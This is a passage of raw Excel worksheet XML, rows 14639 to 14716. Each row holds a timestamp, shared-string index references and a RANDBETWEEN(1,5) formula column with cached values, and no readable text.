        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14639" s="1">
        <v>43237.222812499997</v>
      </c>
      <c r="C14639" t="s">
        <v>463</v>
      </c>
      <c r="E14639" t="s">
        <v>13163</v>
      </c>
      <c r="F14639">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14640" s="1">
        <v>43237.221180555556</v>
      </c>
      <c r="C14640" t="s">
        <v>189</v>
      </c>
      <c r="E14640" t="s">
        <v>13164</v>
      </c>
      <c r="F14640">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14641" s="1">
        <v>43237.205254629633</v>
      </c>
      <c r="C14641" t="s">
        <v>118</v>
      </c>
      <c r="D14641" t="s">
        <v>36</v>
      </c>
      <c r="E14641" t="s">
        <v>13165</v>
      </c>
      <c r="F14641">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14642" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14642" s="1">
        <v>43237.195104166669</v>
      </c>
      <c r="C14642" t="s">
        <v>48</v>
      </c>
      <c r="E14642" s="2" t="s">
        <v>13166</v>
      </c>
      <c r="F14642">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14643" s="1">
        <v>43237.193333333336</v>
      </c>
      <c r="C14643" t="s">
        <v>776</v>
      </c>
      <c r="D14643" t="s">
        <v>36</v>
      </c>
      <c r="E14643" t="s">
        <v>13167</v>
      </c>
      <c r="F14643">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14644" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14644" s="1">
        <v>43237.138680555552</v>
      </c>
      <c r="C14644" t="s">
        <v>41</v>
      </c>
      <c r="E14644" t="s">
        <v>13168</v>
      </c>
      <c r="F14644">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14645" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14645" s="1">
        <v>43237.133796296293</v>
      </c>
      <c r="C14645" t="s">
        <v>41</v>
      </c>
      <c r="F14645">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14646" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14646" s="1">
        <v>43237.127118055556</v>
      </c>
      <c r="C14646" t="s">
        <v>71</v>
      </c>
      <c r="D14646" t="s">
        <v>312</v>
      </c>
      <c r="E14646" s="2" t="s">
        <v>13169</v>
      </c>
      <c r="F14646">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14647" s="1">
        <v>43237.098541666666</v>
      </c>
      <c r="C14647" t="s">
        <v>2140</v>
      </c>
      <c r="D14647" t="s">
        <v>36</v>
      </c>
      <c r="E14647" t="s">
        <v>13170</v>
      </c>
      <c r="F14647">
        <f t="shared" ca="1" si="228"/>
        <v>3</v>
      </c>
    </row>
    <row r="14648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14648" s="1">
        <v>43237.035196759258</v>
      </c>
      <c r="C14648" t="s">
        <v>4879</v>
      </c>
      <c r="D14648" t="s">
        <v>36</v>
      </c>
      <c r="E14648" t="s">
        <v>13171</v>
      </c>
      <c r="F14648">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14649" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A14649" s="1">
        <v>43236.98773148148</v>
      </c>
      <c r="C14649" t="s">
        <v>107</v>
      </c>
      <c r="D14649" t="s">
        <v>20</v>
      </c>
      <c r="E14649" s="2" t="s">
        <v>13172</v>
      </c>
      <c r="F14649">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14650" s="1">
        <v>43236.941099537034</v>
      </c>
      <c r="C14650" t="s">
        <v>11</v>
      </c>
      <c r="D14650" t="s">
        <v>36</v>
      </c>
      <c r="E14650" t="s">
        <v>13173</v>
      </c>
      <c r="F14650">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14651" s="1">
        <v>43236.94023148148</v>
      </c>
      <c r="C14651" t="s">
        <v>103</v>
      </c>
      <c r="D14651" t="s">
        <v>36</v>
      </c>
      <c r="E14651" t="s">
        <v>13174</v>
      </c>
      <c r="F14651">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14652" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14652" s="1">
        <v>43236.914201388892</v>
      </c>
      <c r="C14652" t="s">
        <v>97</v>
      </c>
      <c r="D14652" t="s">
        <v>82</v>
      </c>
      <c r="E14652" s="2" t="s">
        <v>13175</v>
      </c>
      <c r="F14652">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14653" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14653" s="1">
        <v>43236.870706018519</v>
      </c>
      <c r="C14653" t="s">
        <v>97</v>
      </c>
      <c r="D14653" t="s">
        <v>25</v>
      </c>
      <c r="E14653" s="2" t="s">
        <v>13176</v>
      </c>
      <c r="F14653">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14654" s="1">
        <v>43236.862928240742</v>
      </c>
      <c r="C14654" t="s">
        <v>82</v>
      </c>
      <c r="D14654" t="s">
        <v>36</v>
      </c>
      <c r="E14654" t="s">
        <v>13177</v>
      </c>
      <c r="F14654">
        <f t="shared" ca="1" si="228"/>
        <v>4</v>
      </c>
    </row>
    <row r="14655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14655" s="1">
        <v>43236.845729166664</v>
      </c>
      <c r="C14655" t="s">
        <v>2545</v>
      </c>
      <c r="D14655" t="s">
        <v>374</v>
      </c>
      <c r="E14655" t="s">
        <v>13041</v>
      </c>
      <c r="F14655">
        <f t="shared" ca="1" si="228"/>
        <v>1</v>
      </c>
    </row>
    <row r="14656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14656" s="1">
        <v>43236.800810185188</v>
      </c>
      <c r="C14656" t="s">
        <v>10</v>
      </c>
      <c r="D14656" t="s">
        <v>6</v>
      </c>
      <c r="E14656" t="s">
        <v>13178</v>
      </c>
      <c r="F14656">
        <f t="shared" ca="1" si="228"/>
        <v>2</v>
      </c>
    </row>
    <row r="14657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14657" s="1">
        <v>43236.798159722224</v>
      </c>
      <c r="C14657" t="s">
        <v>3163</v>
      </c>
      <c r="D14657" t="s">
        <v>36</v>
      </c>
      <c r="E14657" t="s">
        <v>13179</v>
      </c>
      <c r="F14657">
        <f t="shared" ca="1" si="228"/>
        <v>5</v>
      </c>
    </row>
    <row r="14658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14658" s="1">
        <v>43236.771412037036</v>
      </c>
      <c r="C14658" t="s">
        <v>2545</v>
      </c>
      <c r="D14658" t="s">
        <v>263</v>
      </c>
      <c r="E14658" t="s">
        <v>13041</v>
      </c>
      <c r="F14658">
        <f t="shared" ref="F14658:F14721" ca="1" si="229">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="14659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14659" s="1">
        <v>43236.766192129631</v>
      </c>
      <c r="C14659" t="s">
        <v>10</v>
      </c>
      <c r="D14659" t="s">
        <v>6</v>
      </c>
      <c r="E14659" t="s">
        <v>13180</v>
      </c>
      <c r="F14659">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14660" s="1">
        <v>43236.709062499998</v>
      </c>
      <c r="C14660" t="s">
        <v>10</v>
      </c>
      <c r="D14660" t="s">
        <v>23</v>
      </c>
      <c r="E14660" t="s">
        <v>13181</v>
      </c>
      <c r="F14660">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14661" s="1">
        <v>43236.686249999999</v>
      </c>
      <c r="C14661" t="s">
        <v>197</v>
      </c>
      <c r="D14661" t="s">
        <v>36</v>
      </c>
      <c r="E14661" t="s">
        <v>13182</v>
      </c>
      <c r="F14661">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14662" s="1">
        <v>43236.676493055558</v>
      </c>
      <c r="C14662" t="s">
        <v>314</v>
      </c>
      <c r="D14662" t="s">
        <v>36</v>
      </c>
      <c r="E14662" t="s">
        <v>13183</v>
      </c>
      <c r="F14662">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14663" s="1">
        <v>43236.667245370372</v>
      </c>
      <c r="C14663" t="s">
        <v>16</v>
      </c>
      <c r="E14663" t="s">
        <v>13184</v>
      </c>
      <c r="F14663">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14664" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14664" s="1">
        <v>43236.655173611114</v>
      </c>
      <c r="C14664" t="s">
        <v>10</v>
      </c>
      <c r="D14664" t="s">
        <v>36</v>
      </c>
      <c r="E14664" s="2" t="s">
        <v>13185</v>
      </c>
      <c r="F14664">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14665" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14665" s="1">
        <v>43236.640636574077</v>
      </c>
      <c r="C14665" t="s">
        <v>10</v>
      </c>
      <c r="D14665" t="s">
        <v>52</v>
      </c>
      <c r="E14665" s="2" t="s">
        <v>13186</v>
      </c>
      <c r="F14665">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14666" s="1">
        <v>43236.634305555555</v>
      </c>
      <c r="C14666" t="s">
        <v>10</v>
      </c>
      <c r="D14666" t="s">
        <v>52</v>
      </c>
      <c r="E14666" t="s">
        <v>13187</v>
      </c>
      <c r="F14666">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14667" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14667" s="1">
        <v>43236.614999999998</v>
      </c>
      <c r="C14667" t="s">
        <v>43</v>
      </c>
      <c r="D14667" t="s">
        <v>36</v>
      </c>
      <c r="E14667" t="s">
        <v>13188</v>
      </c>
      <c r="F14667">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14668" s="1">
        <v>43236.601122685184</v>
      </c>
      <c r="C14668" t="s">
        <v>260</v>
      </c>
      <c r="E14668" t="s">
        <v>13189</v>
      </c>
      <c r="F14668">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14669" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14669" s="1">
        <v>43236.598287037035</v>
      </c>
      <c r="C14669" t="s">
        <v>10</v>
      </c>
      <c r="D14669" t="s">
        <v>178</v>
      </c>
      <c r="E14669" s="2" t="s">
        <v>13190</v>
      </c>
      <c r="F14669">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14670" s="1">
        <v>43236.582442129627</v>
      </c>
      <c r="C14670" t="s">
        <v>10</v>
      </c>
      <c r="D14670" t="s">
        <v>158</v>
      </c>
      <c r="E14670" t="s">
        <v>13191</v>
      </c>
      <c r="F14670">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14671" s="1">
        <v>43236.568784722222</v>
      </c>
      <c r="C14671" t="s">
        <v>10</v>
      </c>
      <c r="D14671" t="s">
        <v>6</v>
      </c>
      <c r="E14671" t="s">
        <v>13192</v>
      </c>
      <c r="F14671">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14672" s="1">
        <v>43236.55265046296</v>
      </c>
      <c r="C14672" t="s">
        <v>10</v>
      </c>
      <c r="D14672" t="s">
        <v>107</v>
      </c>
      <c r="E14672" t="s">
        <v>13193</v>
      </c>
      <c r="F14672">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14673" s="1">
        <v>43236.543171296296</v>
      </c>
      <c r="C14673" t="s">
        <v>71</v>
      </c>
      <c r="D14673" t="s">
        <v>36</v>
      </c>
      <c r="E14673" t="s">
        <v>13194</v>
      </c>
      <c r="F14673">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14674" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14674" s="1">
        <v>43236.527962962966</v>
      </c>
      <c r="C14674" t="s">
        <v>6</v>
      </c>
      <c r="D14674" t="s">
        <v>194</v>
      </c>
      <c r="E14674" s="2" t="s">
        <v>13195</v>
      </c>
      <c r="F14674">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14675" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14675" s="1">
        <v>43236.504652777781</v>
      </c>
      <c r="C14675" t="s">
        <v>7419</v>
      </c>
      <c r="D14675" t="s">
        <v>381</v>
      </c>
      <c r="E14675" s="2" t="s">
        <v>13196</v>
      </c>
      <c r="F14675">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14676" s="1">
        <v>43236.480717592596</v>
      </c>
      <c r="C14676" t="s">
        <v>907</v>
      </c>
      <c r="D14676" t="s">
        <v>107</v>
      </c>
      <c r="E14676" t="s">
        <v>13197</v>
      </c>
      <c r="F14676">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14677" s="1">
        <v>43236.474537037036</v>
      </c>
      <c r="C14677" t="s">
        <v>6</v>
      </c>
      <c r="E14677" t="s">
        <v>13198</v>
      </c>
      <c r="F14677">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14678" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14678" s="1">
        <v>43236.469664351855</v>
      </c>
      <c r="C14678" t="s">
        <v>10</v>
      </c>
      <c r="D14678" t="s">
        <v>80</v>
      </c>
      <c r="E14678" s="2" t="s">
        <v>13199</v>
      </c>
      <c r="F14678">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14679" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14679" s="1">
        <v>43236.464062500003</v>
      </c>
      <c r="C14679" t="s">
        <v>97</v>
      </c>
      <c r="D14679" t="s">
        <v>817</v>
      </c>
      <c r="E14679" s="2" t="s">
        <v>13200</v>
      </c>
      <c r="F14679">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14680" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14680" s="1">
        <v>43236.45988425926</v>
      </c>
      <c r="C14680" t="s">
        <v>6</v>
      </c>
      <c r="D14680" t="s">
        <v>25</v>
      </c>
      <c r="E14680" s="2" t="s">
        <v>13201</v>
      </c>
      <c r="F14680">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14681" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14681" s="1">
        <v>43236.45579861111</v>
      </c>
      <c r="C14681" t="s">
        <v>48</v>
      </c>
      <c r="E14681" s="2" t="s">
        <v>13202</v>
      </c>
      <c r="F14681">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14682" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14682" s="1">
        <v>43236.429050925923</v>
      </c>
      <c r="C14682" t="s">
        <v>97</v>
      </c>
      <c r="D14682" t="s">
        <v>41</v>
      </c>
      <c r="E14682" s="2" t="s">
        <v>13203</v>
      </c>
      <c r="F14682">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14683" s="1">
        <v>43236.417303240742</v>
      </c>
      <c r="C14683" t="s">
        <v>10</v>
      </c>
      <c r="D14683" t="s">
        <v>151</v>
      </c>
      <c r="E14683" t="s">
        <v>13204</v>
      </c>
      <c r="F14683">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14684" s="1">
        <v>43236.413402777776</v>
      </c>
      <c r="C14684" t="s">
        <v>6</v>
      </c>
      <c r="D14684" t="s">
        <v>602</v>
      </c>
      <c r="E14684" t="s">
        <v>13205</v>
      </c>
      <c r="F14684">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14685" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14685" s="1">
        <v>43236.403993055559</v>
      </c>
      <c r="C14685" t="s">
        <v>41</v>
      </c>
      <c r="E14685" s="2" t="s">
        <v>13206</v>
      </c>
      <c r="F14685">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14686" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14686" s="1">
        <v>43236.402118055557</v>
      </c>
      <c r="C14686" t="s">
        <v>65</v>
      </c>
      <c r="E14686" s="2" t="s">
        <v>13207</v>
      </c>
      <c r="F14686">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14687" s="1">
        <v>43236.394583333335</v>
      </c>
      <c r="C14687" t="s">
        <v>10</v>
      </c>
      <c r="D14687" t="s">
        <v>23</v>
      </c>
      <c r="E14687" t="s">
        <v>13208</v>
      </c>
      <c r="F14687">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14688" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14688" s="1">
        <v>43236.388182870367</v>
      </c>
      <c r="C14688" t="s">
        <v>71</v>
      </c>
      <c r="E14688" s="2" t="s">
        <v>13209</v>
      </c>
      <c r="F14688">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14689" s="1">
        <v>43236.386724537035</v>
      </c>
      <c r="C14689" t="s">
        <v>8588</v>
      </c>
      <c r="D14689" t="s">
        <v>36</v>
      </c>
      <c r="E14689" t="s">
        <v>13210</v>
      </c>
      <c r="F14689">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14690" s="1">
        <v>43236.377210648148</v>
      </c>
      <c r="C14690" t="s">
        <v>9712</v>
      </c>
      <c r="D14690" t="s">
        <v>36</v>
      </c>
      <c r="E14690" t="s">
        <v>13211</v>
      </c>
      <c r="F14690">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14691" s="1">
        <v>43236.370787037034</v>
      </c>
      <c r="C14691" t="s">
        <v>17</v>
      </c>
      <c r="E14691" t="s">
        <v>13212</v>
      </c>
      <c r="F14691">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14692" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14692" s="1">
        <v>43236.346261574072</v>
      </c>
      <c r="C14692" t="s">
        <v>10</v>
      </c>
      <c r="E14692" s="2" t="s">
        <v>13213</v>
      </c>
      <c r="F14692">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14693" s="1">
        <v>43236.336215277777</v>
      </c>
      <c r="C14693" t="s">
        <v>41</v>
      </c>
      <c r="E14693" t="s">
        <v>13214</v>
      </c>
      <c r="F14693">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14694" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14694" s="1">
        <v>43236.334409722222</v>
      </c>
      <c r="C14694" t="s">
        <v>71</v>
      </c>
      <c r="E14694" s="2" t="s">
        <v>13215</v>
      </c>
      <c r="F14694">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14695" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14695" s="1">
        <v>43236.33425925926</v>
      </c>
      <c r="C14695" t="s">
        <v>535</v>
      </c>
      <c r="D14695" t="s">
        <v>312</v>
      </c>
      <c r="E14695" t="s">
        <v>13216</v>
      </c>
      <c r="F14695">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14696" s="1">
        <v>43236.298356481479</v>
      </c>
      <c r="C14696" t="s">
        <v>6</v>
      </c>
      <c r="D14696" t="s">
        <v>2139</v>
      </c>
      <c r="E14696" t="s">
        <v>13217</v>
      </c>
      <c r="F14696">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14697" s="1">
        <v>43236.287731481483</v>
      </c>
      <c r="C14697" t="s">
        <v>48</v>
      </c>
      <c r="E14697" t="s">
        <v>13218</v>
      </c>
      <c r="F14697">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14698" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14698" s="1">
        <v>43236.281041666669</v>
      </c>
      <c r="C14698" t="s">
        <v>10</v>
      </c>
      <c r="D14698" t="s">
        <v>163</v>
      </c>
      <c r="E14698" t="s">
        <v>13219</v>
      </c>
      <c r="F14698">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14699" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14699" s="1">
        <v>43236.265381944446</v>
      </c>
      <c r="C14699" t="s">
        <v>454</v>
      </c>
      <c r="E14699" s="2" t="s">
        <v>13220</v>
      </c>
      <c r="F14699">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14700" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14700" s="1">
        <v>43236.26458333333</v>
      </c>
      <c r="C14700" t="s">
        <v>2210</v>
      </c>
      <c r="D14700" t="s">
        <v>232</v>
      </c>
      <c r="E14700" s="2" t="s">
        <v>13221</v>
      </c>
      <c r="F14700">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14701" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14701" s="1">
        <v>43236.243020833332</v>
      </c>
      <c r="C14701" t="s">
        <v>197</v>
      </c>
      <c r="D14701" t="s">
        <v>312</v>
      </c>
      <c r="E14701" s="2" t="s">
        <v>13222</v>
      </c>
      <c r="F14701">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14702" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A14702" s="1">
        <v>43236.242812500001</v>
      </c>
      <c r="C14702" t="s">
        <v>197</v>
      </c>
      <c r="D14702" t="s">
        <v>312</v>
      </c>
      <c r="E14702" s="2" t="s">
        <v>13222</v>
      </c>
      <c r="F14702">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14703" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14703" s="1">
        <v>43236.234918981485</v>
      </c>
      <c r="C14703" t="s">
        <v>48</v>
      </c>
      <c r="E14703" s="2" t="s">
        <v>13223</v>
      </c>
      <c r="F14703">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14704" s="1">
        <v>43236.197928240741</v>
      </c>
      <c r="C14704" t="s">
        <v>97</v>
      </c>
      <c r="E14704" t="s">
        <v>13224</v>
      </c>
      <c r="F14704">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14705" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14705" s="1">
        <v>43236.18986111111</v>
      </c>
      <c r="C14705" t="s">
        <v>65</v>
      </c>
      <c r="D14705" t="s">
        <v>312</v>
      </c>
      <c r="E14705" s="2" t="s">
        <v>13225</v>
      </c>
      <c r="F14705">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14706" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14706" s="1">
        <v>43236.135497685187</v>
      </c>
      <c r="C14706" t="s">
        <v>48</v>
      </c>
      <c r="E14706" s="2" t="s">
        <v>13226</v>
      </c>
      <c r="F14706">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14707" s="1">
        <v>43236.119166666664</v>
      </c>
      <c r="C14707" t="s">
        <v>41</v>
      </c>
      <c r="E14707" t="s">
        <v>13227</v>
      </c>
      <c r="F14707">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14708" s="1">
        <v>43236.11546296296</v>
      </c>
      <c r="C14708" t="s">
        <v>339</v>
      </c>
      <c r="D14708" t="s">
        <v>36</v>
      </c>
      <c r="E14708" t="s">
        <v>13228</v>
      </c>
      <c r="F14708">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14709" s="1">
        <v>43236.102754629632</v>
      </c>
      <c r="C14709" t="s">
        <v>10</v>
      </c>
      <c r="D14709" t="s">
        <v>23</v>
      </c>
      <c r="E14709" t="s">
        <v>13229</v>
      </c>
      <c r="F14709">
        <f t="shared" ca="1" si="229"/>
        <v>4</v>
      </c>
    </row>
    <row r="14710" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14710" s="1">
        <v>43236.101203703707</v>
      </c>
      <c r="C14710" t="s">
        <v>6</v>
      </c>
      <c r="D14710" t="s">
        <v>36</v>
      </c>
      <c r="E14710" t="s">
        <v>13230</v>
      </c>
      <c r="F14710">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14711" s="1">
        <v>43236.099768518521</v>
      </c>
      <c r="C14711" t="s">
        <v>2144</v>
      </c>
      <c r="D14711" t="s">
        <v>36</v>
      </c>
      <c r="E14711" t="s">
        <v>13231</v>
      </c>
      <c r="F14711">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14712" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14712" s="1">
        <v>43236.090960648151</v>
      </c>
      <c r="C14712" t="s">
        <v>173</v>
      </c>
      <c r="D14712" t="s">
        <v>7</v>
      </c>
      <c r="E14712" s="2" t="s">
        <v>13232</v>
      </c>
      <c r="F14712">
        <f t="shared" ca="1" si="229"/>
        <v>5</v>
      </c>
    </row>
    <row r="14713" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14713" s="1">
        <v>43236.04791666667</v>
      </c>
      <c r="C14713" t="s">
        <v>454</v>
      </c>
      <c r="F14713">
        <f t="shared" ca="1" si="229"/>
        <v>2</v>
      </c>
    </row>
    <row r="14714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14714" s="1">
        <v>43236.038368055553</v>
      </c>
      <c r="C14714" t="s">
        <v>5087</v>
      </c>
      <c r="D14714" t="s">
        <v>36</v>
      </c>
      <c r="E14714" t="s">
        <v>13233</v>
      </c>
      <c r="F14714">
        <f t="shared" ca="1" si="229"/>
        <v>3</v>
      </c>
    </row>
    <row r="14715" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14715" s="1">
        <v>43235.962581018517</v>
      </c>
      <c r="C14715" t="s">
        <v>73</v>
      </c>
      <c r="E14715" s="2" t="s">
        <v>13234</v>
      </c>
      <c r="F14715">
        <f t="shared" ca="1" si="229"/>
        <v>1</v>
      </c>
    </row>
    <row r="14716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14716" s="1">
        <v>43235.948923611111</v>
      </c>
